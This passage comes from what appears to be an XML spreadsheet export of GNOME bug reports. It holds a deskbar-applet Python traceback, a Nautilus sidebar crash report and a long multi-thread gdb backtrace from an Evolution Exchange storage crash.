(gnome-panel:30687): Gtk-WARNING **: gtk_widget_size_allocate(): attempt to allocate widget with width -9 and height 24
Got Event! 33 -1
--------------------------------------------------
Traceback (most recent call last):
  File /usr/lib/deskbar-applet/modules-2.20-compatible/beagle-live.py line 303 in hits_added
    logging.info(Beagle live seen an unknown type:+ hit.get_type())
TypeError: cannot concatenate 'str' and 'NoneType' objects</t>
  </si>
  <si>
    <t>NAUTILUS-73432</t>
  </si>
  <si>
    <t>[obsolete] Sidebar</t>
  </si>
  <si>
    <t>crash in sidebar tab drawing code when first window opens</t>
  </si>
  <si>
    <t xml:space="preserve">Package: nautilus
Severity: critical
Version: 1.1.6
Synopsis: opening window bring crash of nautilus
Bugzilla-Product: nautilus
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (1.112.0)
Description:
Description of Problem:
on ximian gnome2 preview package of redhat 7.2 whenever opening window
make nautilus crash.
Steps to reproduce the problem:
1. run nautilus: nautilus
2. default window pop up and some part of window frame appears while
spinner dance. and crash..
3. then respawn nautilus with no default window start.
Actual Results:
show me the folder.
Expected Results:
crash.
How often does this happen?
whenever opening folder.
Additional Information:
Debugging Information:
[New Thread 1024 (LWP 6065)]
[New Thread 2049 (LWP 6066)]
[New Thread 1026 (LWP 6067)]
[New Thread 2051 (LWP 6068)]
[New Thread 3076 (LWP 6069)]
[New Thread 4101 (LWP 6070)]
[New Thread 5126 (LWP 6071)]
0x40a0bca9 in __wait4 () from /lib/i686/libc.so.6
#0  0x40a0bca9 in __wait4 () from /lib/i686/libc.so.6
#1  0x40a876b4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x408486f3 in waitpid (pid=6074 stat_loc=0xbfffc74c options=0)
    at wrapsyscall.c:172
#3  0x40184ff9 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:598
#4  0x40846a85 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 1 esi = 0 ebp = 3221211992 esp = 3221211896 ebx
= 1079876088 edx = 3221211952 ecx = 1 eax = 1919 trapno = 14 err =
4 eip = 1079836058 cs = 35 __csh = 0 eflags = 2163202 esp_at_signal
= 3221211896 ss = 43 __ssh = 0 fpstate = 0xbfffc878 oldmask =
2147483648 cr2 = 48}) at signals.c:97
#5  
#6  gdk_pixbuf_composite (src=0x0 dest=0x8380530 dest_x=1 dest_y=1 
    dest_width=0 dest_height=0 offset_x=1 offset_y=1 scale_x=1
scale_y=1 
    interp_type=GDK_INTERP_BILINEAR overall_alpha=255)
    at gdk-pixbuf-scale.c:126
#7  0x400edc8d in eel_gdk_pixbuf_draw_layout_clipped (pixbuf=0x8380530
region=
      {x0 = 1 y0 = 1 x1 = 2147483647 y1 = 2147483647} color=0 
    layout=0x8380370) at eel-gdk-pixbuf-extensions.c:1392
#8  0x400edcf0 in eel_gdk_pixbuf_draw_layout (pixbuf=0x8380530 x=1
y=1 
    color=0 layout=0x8380370) at eel-gdk-pixbuf-extensions.c:1424
#9  0x0806d244 in draw_one_tab_plain (sidebar_tabs=0x830f4f8
gc=0x83802b0 
    tab_name=0x8317568 
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-03-04 16:09 -------
Unknown version 1.1.x in product nautilus. Setting version to the default unspecified.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-516252</t>
  </si>
  <si>
    <t>Exchange storage crashed at start up</t>
  </si>
  <si>
    <t>Evolution 2.21.91
Bug buddy traces of exchange-storage process
Distribution: openSUSE 10.3 (i586)
Gnome Release: 2.20.0 2007-09-22 (SUSE)
BugBuddy Version: 2.20.0
System: Linux 2.6.22.5-31-default #1 SMP 2007/09/21 22:29:00 UTC i686
X Vendor: The X.Org Foundation
X Vendor Release: 70200000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Gilouche
Icon Theme: Industrial
Memory status: size: 70541312 vsize: 70541312 resident: 2387968 share: 9994240 rss: 12382208 rss_rlim: 1792414720
CPU usage: start_time: 1202908838 rtime: 15 utime: 11 stime: 4 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/lib/evolution-exchange-storage'
[?1034hUsing host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 0xb61eb8d0 (LWP 19218)]
[New Thread 0xb29ffb90 (LWP 19297)]
[New Thread 0xb43fcb90 (LWP 19281)]
[New Thread 0xb4bfdb90 (LWP 19273)]
[New Thread 0xb53feb90 (LWP 19240)]
[New Thread 0xb5bffb90 (LWP 19224)]
[New Thread 0xb5e09b90 (LWP 19219)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb6494c1e in __lll_mutex_lock_wait () from /lib/libpthread.so.0
#2  0xb6490a58 in _L_mutex_lock_86 () from /lib/libpthread.so.0
#3  0xb649047d in __pthread_mutex_lock (mutex=0x80e5000)
    at pthread_mutex_lock.c:81
#4  0xb6ffb453 in exchange_account_set_online (account=0x80abe98)
    at exchange-account.c:1200
#5  0x0806077d in stub_connect (stub=0x80ad910 pwd=0x8105c88 passwd)
    at mail-stub-exchange.c:3263
#6  0x0806451e in connection_handler (source=0x8117d18 condition=G_IO_IN 
    data=0x80ad910) at mail-stub.c:104
#7  0xb66e7dad in g_io_unix_dispatch (source=0x811f700 
    callback=0x8063aa0  user_data=0x80ad910)
    at giounix.c:162
#8  0xb66b37c6 in g_main_context_dispatch (context=0x80b09c8) at gmain.c:2064
#9  0xb66b6bb2 in g_main_context_iterate (context=0x80b09c8 block=1 
    dispatch=1 self=0x8086190) at gmain.c:2697
#10 0xb66b6f97 in g_main_loop_run (loop=0x80d9648) at gmain.c:2905
#11 0xb6df9ea3 in bonobo_main () at bonobo-main.c:311
#12 0x0805b254 in main (argc=3 argv=) at main.c:238
Thread 7 (Thread 0xb5e09b90 (LWP 19219)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb62eb817 in *__GI___poll (fds=0x80f3500 nfds=11 timeout=-1)
    at ../sysdeps/unix/sysv/linux/poll.c:87
	resultvar = 
	oldtype = 0
	result = 
#2  0xb66b6be5 in g_main_context_iterate (context=0x80d8100 block=1 
    dispatch=1 self=0x80d8080) at gmain.c:3006
	got_ownership = 
	max_priority = 2147483647
	timeout = -1
	some_ready = 
	nfds = 11
	allocated_nfds = 
	fds = (GPollFD *) 0x80f3500
	__PRETTY_FUNCTION__ = g_main_context_iterate
#3  0xb66b6f97 in g_main_loop_run (loop=0x80d8180) at gmain.c:2905
	got_ownership = -1236728800
	self = (GThread *) 0x80d8080
	__PRETTY_FUNCTION__ = g_main_loop_run
#4  0xb6d6dd93 in link_io_thread_fn (data=0x0) at linc.c:396
No locals.
#5  0xb66db9bf in g_thread_create_proxy (data=0x80d8080) at gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#6  0xb648e192 in start_thread (arg=0xb5e09b90) at pthread_create.c:296
	__res = 
	__ignore1 = 
	__ignore2 = 
	pd = (struct pthread *) 0xb5e09b90
	now = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1236676620 0 4001536 
        -1243573064 1264095123 465432980} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 0}}}
	not_first_call = 0
	robust = 
#7  0xb62f502e in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb63306f0
Thread 6 (Thread 0xb5bffb90 (LWP 19224)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb64927ec in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0xb67e7fb7 in g_cond_timed_wait_posix_impl (cond=0x80e7cd0 
    entered_mutex=0x0 abs_time=0x17) at gthread-posix.c:242
	result = 
	end_time = {tv_sec = 1202908842 tv_nsec = 823461000}
	timed_out = 
	__PRETTY_FUNCTION__ = g_cond_timed_wait_posix_impl
#3  0xb668ea91 in g_async_queue_pop_intern_unlocked (queue=0x80b06d0 
    try= end_time=0xb5bff384) at gasyncqueue.c:364
	retval = 
	__PRETTY_FUNCTION__ = g_async_queue_pop_intern_unlocked
#4  0xb66dd746 in g_thread_pool_thread_proxy (data=0x80b1430)
    at gthreadpool.c:220
	task = 
	pool = (GRealThreadPool *) 0x80b1430
#5  0xb66db9bf in g_thread_create_proxy (data=0x80e6e58) at gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#6  0xb648e192 in start_thread (arg=0xb5bffb90) at pthread_create.c:296
	__res = 
	__ignore1 = 
	__ignore2 = 
	pd = (struct pthread *) 0xb5bffb90
	now = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1236676620 0 4001536 
        -1245711176 -174551149 465432980} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 0}}}
	not_first_call = 0
	robust = 
#7  0xb62f502e in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb63306f0
Thread 5 (Thread 0xb53feb90 (LWP 19240)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb64927ec in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0xb67e7fb7 in g_cond_timed_wait_posix_impl (cond=0x80e7cd0 
    entered_mutex=0x0 abs_time=0x15) at gthread-posix.c:242
	result = 
	end_time = {tv_sec = 1202908842 tv_nsec = 822911000}
	timed_out = 
	__PRETTY_FUNCTION__ = g_cond_timed_wait_posix_impl
#3  0xb668ea91 in g_async_queue_pop_intern_unlocked (queue=0x80b06d0 
    try= end_time=0xb53fe384) at gasyncqueue.c:364
	retval = 
	__PRETTY_FUNCTION__ = g_async_queue_pop_intern_unlocked
#4  0xb66dd746 in g_thread_pool_thread_proxy (data=0x80b1430)
    at gthreadpool.c:220
	task = 
	pool = (GRealThreadPool *) 0x80b1430
#5  0xb66db9bf in g_thread_create_proxy (data=0x80ef9f0) at gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#6  0xb648e192 in start_thread (arg=0xb53feb90) at pthread_create.c:296
	__res = 
	__ignore1 = 
	__ignore2 = 
	pd = (struct pthread *) 0xb53feb90
	now = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1236676620 0 4001536 
        -1254103880 -172453998 465432980} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 0}}}
	not_first_call = 0
	robust = 
#7  0xb62f502e in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb63306f0
Thread 4 (Thread 0xb4bfdb90 (LWP 19273)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb64927ec in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0xb67e7fb7 in g_cond_timed_wait_posix_impl (cond=0x80e7cd0 
    entered_mutex=0x0 abs_time=0x14) at gthread-posix.c:242
	result = 
	end_time = {tv_sec = 1202908842 tv_nsec = 750274000}
	timed_out = 
	__PRETTY_FUNCTION__ = g_cond_timed_wait_posix_impl
#3  0xb668ea91 in g_async_queue_pop_intern_unlocked (queue=0x80b06d0 
    try= end_time=0xb4bfd384) at gasyncqueue.c:364
	retval = 
	__PRETTY_FUNCTION__ = g_async_queue_pop_intern_unlocked
#4  0xb66dd746 in g_thread_pool_thread_proxy (data=0x80b1430)
    at gthreadpool.c:220
	task = 
	pool = (GRealThreadPool *) 0x80b1430
#5  0xb66db9bf in g_thread_create_proxy (data=0x8117d70) at gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#6  0xb648e192 in start_thread (arg=0xb4bfdb90) at pthread_create.c:296
	__res = 
	__ignore1 = 
	__ignore2 = 
	pd = (struct pthread *) 0xb4bfdb90
	now = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1236676620 0 4001536 
        -1262496584 -170356847 465432980} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 0}}}
	not_first_call = 0
	robust = 
#7  0xb62f502e in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb63306f0
Thread 3 (Thread 0xb43fcb90 (LWP 19281)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb649605b in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb66ea027 in g_spawn_sync (working_directory=0x0 argv=0x81202c8 
    envp=0x0 flags= child_setup=0 user_data=0x0 
    standard_output=0x0 standard_error=0x0 exit_status=0x0 error=0xb43fa7b8)
    at gspawn.c:374
	outpipe = -1
	errpipe = -1
	pid = 19282
	fds = {__fds_bits = {0 0 135395608 -1270896952 -1234361987 8 
    135395608 4 135094432 -1234362023 -1233879052 -1270896840 
    -1234704728 -1233874944 -1234454944 -1 -1208987660 -1233874944 
    -1234704728 -1270896864 -1209043489 -1233874504 0 1 1 0 
    -1234663088 -1234726912 848532 -1234704728 -1233879052 0}}
	ret = 
	outstr = (GString *) 0x0
	errstr = (GString *) 0x0
	failed = 0
	status = 
	__PRETTY_FUNCTION__ = g_spawn_sync
#3  0xb66ea35c in g_spawn_command_line_sync (
    command_line=0x80f3d98 bug-buddy --appname=\evolution-exchange-storage\ --pid=19218 standard_output=0x0 standard_error=0x0 exit_status=0x0 
    error=0xb43fa7b8) at gspawn.c:682
	retval = 0
	argv = (gchar **) 0x81202c8
	__PRETTY_FUNCTION__ = g_spawn_command_line_sync
#4  0xb608b700 in ?? () from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
No symbol table info available.
#5  0xb608bbf2 in ?? () from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
No symbol table info available.
#6  0xb608be43 in google_breakpad::ExceptionHandler::InternalWriteMinidump ()
   from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
No symbol table info available.
#7  0xb608c42e in google_breakpad::ExceptionHandler::HandleException ()
   from /usr/lib/gtk-2.0/modules/libgnomebreakpad.so
No symbol table info available.
#8  
No symbol table info available.
#9  e_book_backend_exchange_connect (be=0x80da548)
    at e-book-backend-exchange.c:576
	hier = (ExchangeHierarchy *) 0x0
	bepriv = (EBookBackendExchangePrivate *) 0x80e8340
	hier = 
	summary_path = 
	results = 
	nresults = 0
	status = 
	folder_mtime = 
#10 0x0806e6e7 in e_book_backend_exchange_authenticate_user (
    backend=0x80da548 book=0x80c9380 opid=2 
    user=0x811f3a9 expert.com\\chen password=0x8104df9 passwd 
    auth_method=0x80f9601 plain/password) at e-book-backend-exchange.c:2278
	be = (EBookBackendExchange *) 0x80da548
	bepriv = (EBookBackendExchangePrivate *) 0x80e8340
	result = EXCHANGE_ACCOUNT_PASSWORD_WEAK_ERROR
	account = (ExchangeAccount *) 0x80abe98
#11 0xb7d12105 in e_book_backend_authenticate_user (backend=0x80da548 
    book=0x80c9380 opid=2 user=0x811f3a9 expert.com\\chen 
    passwd=0x8104df9 passwd auth_method=0x80f9601 plain/password)
    at e-book-backend.c:379
	__PRETTY_FUNCTION__ = e_book_backend_authenticate_user
#12 0xb7d16ee3 in impl_GNOME_Evolution_Addressbook_Book_authenticateUser (
    servant=0x80c9394 opid=2 user=0x811f3a9 expert.com\\chen 
    passwd=0x8104df9 passwd auth_method=0x80f9601 plain/password 
    ev=0xb43fc2c0) at e-data-book.c:91
No locals.
#13 0xb7d07e5c in _ORBIT_skel_small_GNOME_Evolution_Addressbook_Book_authenticateUser (_o_servant=0x80c9394 _o_retval=0x0 _o_args=0xb43fc160 
    _o_ctx=0xb43fc1d4 _o_ev=0xb43fc2c0 
    _impl_authenticateUser=0xb7d16e80 ) at Evolution-DataServer-Addressbook-common.c:60
No locals.
#14 0xb6d62038 in ORBit_POAObject_invoke (pobj=0x80e6d88 ret=0x0 
    args=0xb43fc160 ctx=0xb43fc1d4 data=0xb43fc26c ev=0xb43fc2c0)
    at poa.c:1142
	invoke_data = (struct ORBit_POA_invoke_data *) 0xb43fc26c
#15 0xb6d67fe3 in ORBit_OAObject_invoke (adaptor_obj=0x80e6d88 ret=0x0 
    args=0xb43fc160 ctx=0xb43fc1d4 data=0xb43fc26c ev=0xb43fc2c0)
    at orbit-adaptor.c:338
No locals.
#16 0xb6d4cbdb in ORBit_small_invoke_adaptor (adaptor_obj=0x80e6d88 
    recv_buffer=0x811dcb8 m_data=0xb7db31c0 data=0xb43fc26c ev=0xb43fc2c0)
    at orbit-small.c:844
	ctx = {parent = {interface = 0xb6362170 refs = 0} mappings = 0x800 
  children = 0x58 the_name = 0xb649179c \201ÃƒXÂ¸ parent_ctx = 0x811fa60}
	args = (gpointer *) 0xb43fc160
	scratch = (gpointer *) 0xb43fc140
	pretval = (gpointer) 0x0
	retval = (gpointer) 0x0
	send_buffer = (GIOPSendBuffer *) 0xb43fc208
	orb = (CORBA_ORB) 0x80b1fc0
	tc = (CORBA_TypeCode) 0xb6d86ae0
	has_context = 0
	i = 4
#17 0xb6d626fb in ORBit_POAObject_handle_request (pobj=0x80e6d88 
    opname=0x811c4dc authenticateUser ret=0x0 args=0x0 ctx=0x0 
    recv_buffer=0x811dcb8 ev=0xb43fc2c0) at poa.c:1351
	invoke_data = {
  small_skel = 0xb7d07e20  imp = 0xb7d16e80}
	poa = (PortableServer_POA) 0x80eae00
	cookie = (PortableServer_ServantLocator_Cookie) 0x0
	oid = (PortableServer_ObjectId *) 0x80e5874
	klass = (PortableServer_ClassInfo *) 0xb7db3f28
	m_data = (ORBit_IMethod *) 0xb7db31c0
	small_skel = (
    ORBitSmallSkeleton) 0xb7d07e20 
	imp = (gpointer) 0xb7d16e80
	__PRETTY_FUNCTION__ = ORBit_POAObject_handle_request
#18 0xb6d62973 in ORBit_POAObject_invoke_incoming_request (pobj=0x80e6d88 
    recv_buffer=0x811dcb8 opt_ev=0x0) at poa.c:1421
	opname = (CORBA_Identifier) 0x811c4dc authenticateUser
	real_ev = {_id = 0x0 _major = 0 _any = {_type = 0x0 _value = 0x0 
    _release = 0 '\0'}}
	ev = (CORBA_Environment *) 0xb43fc2c0
#19 0xb6d435e0 in giop_thread_queue_process (tdata=0x811dd28) at giop.c:771
	ent = (GIOPMessageQueueEntry *) 0x0
	qe = (GIOPQueueEntry *) 0x8104db8
	request = (GList *) 0x0
	no_policy = 1
#20 0xb6d42be5 in giop_request_handler_thread (data=0x811dd28 user_data=0x0)
    at giop.c:481
	done = -1270889596
	l = (GList *) 0xb6747ff4
	tdata = (GIOPThread *) 0x811dd28
#21 0xb66dd652 in g_thread_pool_thread_proxy (data=0x80b1430)
    at gthreadpool.c:265
	task = (gpointer) 0x811dd28
	pool = (GRealThreadPool *) 0x80b1430
#22 0xb66db9bf in g_thread_create_proxy (data=0x811dd50) at gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#23 0xb648e192 in start_thread (arg=0xb43fcb90) at pthread_create.c:296
	__res = 
	__ignore1 = 
	__ignore2 = 
	pd = (struct pthread *) 0xb43fcb90
	now = 
	unwind_buf = {cancel_jmp_buf = {{jmp_buf = {-1236676620 0 4001536 
        -1270889288 -168259696 465432980} mask_was_saved = 0}} priv = {
    pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 cleanup = 0x0 
      canceltype = 0}}}
	not_first_call = 0
	robust = 
#24 0xb62f502e in clone () from /lib/libc.so.6
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb63306f0
Thread 2 (Thread 0xb29ffb90 (LWP 19297)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb6495348 in recv () from /lib/libpthread.so.0
No symbol table info available.
#2  0xb64eb685 in _gnutls_read ()
   from /home/build/opt/gnome2/lib/libgnutls.so.13
No symbol table info available.
#3  0xb64ebe37 in _gnutls_io_read_buffered ()
   from /home/build/opt/gnome2/lib/libgnutls.so.13
No symbol table info available.
#4  0xb64e8e34 in _gnutls_recv_int ()
   from /home/build/opt/gnome2/lib/libgnutls.so.13
No symbol table info available.
#5  0xb64e9ba6 in gnutls_record_recv ()
   from /home/build/opt/gnome2/lib/libgnutls.so.13
No symbol table info available.
#6  0xb64b9172 in soup_gnutls_read (channel=0xb5c02788 
    buf=0x82be2a0 Ã¸Â©1\b(a%\bÃ¸Â©1\b(a%\bti-Status\r\nDate: Wed 13 Feb 2008 13:32:06 GMT\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\nContent-Type: text/xml\r\nAccept-Ranges: rows\r\nMS-WebStorage: 6.5.7638\r\nTransfer-Encodin... count=8192 bytes_read=0xb29fcfc8 err=0xb29fd008) at soup-gnutls.c:194
	chan = 
	result = 
#7  0xb66aa1ab in g_io_channel_read_chars (channel=0xb5c02788 
    buf=0x82be2a0 Ã¸Â©1\b(a%\bÃ¸Â©1\b(a%\bti-Status\r\nDate: Wed 13 Feb 2008 13:32:06 GMT\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\nContent-Type: text/xml\r\nAccept-Ranges: rows\r\nMS-WebStorage: 6.5.7638\r\nTransfer-Encodin... count=8192 bytes_read=0xb29ff0a8 error=0xb29fd008) at giochannel.c:1787
	tmp_bytes = 
	status = 
	got_bytes = 
	__PRETTY_FUNCTION__ = g_io_channel_read_chars
#8  0xb64c6888 in read_from_network (sock=0x80f6868 buffer=0x82be2a0 
    len= nread=0xb29ff0a8 error=0xb29ff0a0)
    at soup-socket.c:1046
	priv = (SoupSocketPrivate *) 0x80f6878
	status = 
	cond = G_IO_IN
	my_err = (GError *) 0x0
#9  0xb64c6b41 in soup_socket_read_until (sock=0x80f6868 buffer=0xb29fd0a0 
    len=8192 boundary=0xb64d06a1 boundary_len=2 nread=0xb29ff0a8 
    got_boundary=0xb29ff0a4 cancellable=0x0 error=0xb29ff0a0)
    at soup-socket.c:1213
	status = 
	p = 
	__PRETTY_FUNCTION__ = soup_socket_read_until
#10 0xb64bf954 in read_metadata (msg=0x8160a40 boundary=0xb64d06a1 \r\n)
    at soup-message-io.c:232
	io = (SoupMessageIOData *) 0x8163b28
	status = 
	read_buf = {72 'H' 84 'T' 84 'T' 80 'P' 47 '/' 49 '1' 46 '.' 
  49 '1' 32 ' ' 50 '2' 48 '0' 55 '7' 32 ' ' 77 'M' 117 'u' 108 'l' 
  116 't' 105 'i' 45 '-' 83 'S' 116 't' 97 'a' 116 't' 117 'u' 
  115 's' 13 '\r' 10 '\n' 68 'D' 97 'a' 116 't' 101 'e' 58 ':' 32 ' ' 
  87 'W' 101 'e' 100 'd' 44 '' 32 ' ' 49 '1' 51 '3' 32 ' ' 70 'F' 
  101 'e' 98 'b' 32 ' ' 50 '2' 48 '0' 48 '0' 56 '8' 32 ' ' 49 '1' 
  51 '3' 58 ':' 51 '3' 50 '2' 58 ':' 48 '0' 54 '6' 32 ' ' 71 'G' 
  77 'M' 84 'T' 13 '\r' 10 '\n' 83 'S' 101 'e' 114 'r' 118 'v' 
  101 'e' 114 'r' 58 ':' 32 ' ' 77 'M' 105 'i' 99 'c' 114 'r' 111 'o' 
  115 's' 111 'o' 102 'f' 116 't' 45 '-' 73 'I' 73 'I' 83 'S' 47 '/' 
  54 '6' 46 '.' 48 '0' 13 '\r' 10 '\n' 88 'X' 45 '-' 80 'P' 111 'o' 
  119 'w' 101 'e' 114 'r' 101 'e' 100 'd' 45 '-' 66 'B' 121 'y' 
  58 ':' 32 ' ' 65 'A' 83 'S' 80 'P' 46 '.' 78 'N' 69 'E' 84 'T' 
  13 '\r' 10 '\n' 67 'C' 111 'o' 110 'n' 116 't' 101 'e' 110 'n' 
  116 't' 45 '-' 84 'T' 121 'y' 112 'p' 101 'e' 58 ':' 32 ' ' 116 't' 
  101 'e' 120 'x' 116 't' 47 '/' 120 'x' 109 'm' 108 'l' 13 '\r' 
  10 '\n' 65 'A' 99 'c' 99 'c' 101 'e' 112 'p' 116 't' 45 '-' 82 'R' 
  97 'a' 110 'n' 103 'g' 101 'e' 115 's' 58 ':' 32 ' ' 114 'r' 
  111 'o' 119 'w' 115 's' 13 '\r' 10 '\n' 77 'M' 83 'S' 45 '-' 87 'W' 
  101 'e' 98 'b' 83 'S' 116 't' 111 'o' 114 'r' 97 'a' 103 'g' 
  101 'e' 58 ':' 32 ' ' 54 '6' 46 '.' 53 '5' 46 '.' 55 '7' 54 '6' 
  51 '3' 56 '8' 13 '\r' 10 '\n' 84 'T' 114 'r' 97 'a' 110 'n' 115 's' 
  102 'f' 101 'e' 114 'r' 45 '-' 69 'E' 110 'n' 99 'c' 111 'o' 
  100 'd' 105 'i' 110 'n'...}
	boundary_len = 2
	nread = 3058432157
	done = 0
	error = (GError *) 0x0
#11 0xb64bfba4 in io_read (sock=0x80f6868 msg=0x8160a40)
    at soup-message-io.c:712
	priv = (SoupMessagePrivate *) 0x8160a68
	io = (SoupMessageIOData *) 0x8163b28
	status = 200
	__PRETTY_FUNCTION__ = io_read
#12 0xb64be083 in soup_message_send_request (req=0x8160a40 sock=0x80f6868 
    conn=0x8116150 is_via_proxy=0) at soup-message-client-io.c:117
No locals.
#13 0xb64b622e in send_request (conn=0x8116150 req=0x8160a40)
    at soup-connection.c:717
	priv = (SoupConnectionPrivate *) 0x8116160
#14 0xb64b5239 in soup_connection_send_request (conn=0x8116150 req=0x8160a40)
    at soup-connection.c:736
	__PRETTY_FUNCTION__ = soup_connection_send_request
#15 0xb64c5f49 in send_message (session=0x80d6e78 msg=0x8160a40)
    at soup-session-sync.c:252
	priv = (SoupSessionSyncPrivate *) 0x80d6ec8
	conn = (SoupConnection *) 0x8116150
#16 0xb64c3a92 in soup_session_send_message (session=0x80d6e78 msg=0x8160a40)
    at soup-session.c:1057
	__PRETTY_FUNCTION__ = soup_session_send_message
#17 0xb7008812 in e2k_context_send_message (ctx=0x80f1f60 op=0x0 
    msg=0x8160a40) at e2k-context.c:852
	status = 
	__PRETTY_FUNCTION__ = e2k_context_send_message
#18 0xb7008fd1 in bpropfind_fetch (iter=0x81659b0 ctx=0x80f1f60 op=0x0 
    results=0x81659bc nresults=0x81659c0 first=0x81659c8 total=0x81659cc 
    user_data=0x821cf08) at e2k-context.c:1661
	status = 200
	msg = (SoupMessage *) 0x8160a40
#19 0xb7012f22 in iter_fetch (iter=0x81659b0) at e2k-result.c:468
No locals.
#20 0xb7013079 in e2k_result_iter_new (ctx=0x80f1f60 op=0x0 ascending=1 
    total=77 fetch_func=0xb7008f80  
    free_func=0xb7006f50  user_data=0x821cf08)
    at e2k-result.c:523
	iter = (E2kResultIter *) 0xfffffffc
#21 0xb700860b in e2k_context_bpropfind_start (ctx=0x80f1f60 op=0x0 
    uri=0x8122cd0 https://IP address/exchange/chen/Calendar/ 
    hrefs=0x8176160 nhrefs=77 props=0x8085430 nprops=3)
    at e2k-context.c:1715
	msg = 
	i = 100
	__PRETTY_FUNCTION__ = e2k_context_bpropfind_start
#22 0xb6ff44a2 in e_folder_exchange_bpropfind_start (folder=0x80f4900 op=0x0 
    hrefs=0x8176160 nhrefs=77 props=0x8085430 nprops=3)
    at e-folder-exchange.c:679
	__PRETTY_FUNCTION__ = e_folder_exchange_bpropfind_start
#23 0x08071455 in get_changed_events (cbex=0x80f2028)
    at e-cal-backend-exchange-calendar.c:437
	hrefs = (GPtrArray *) 0x8322030
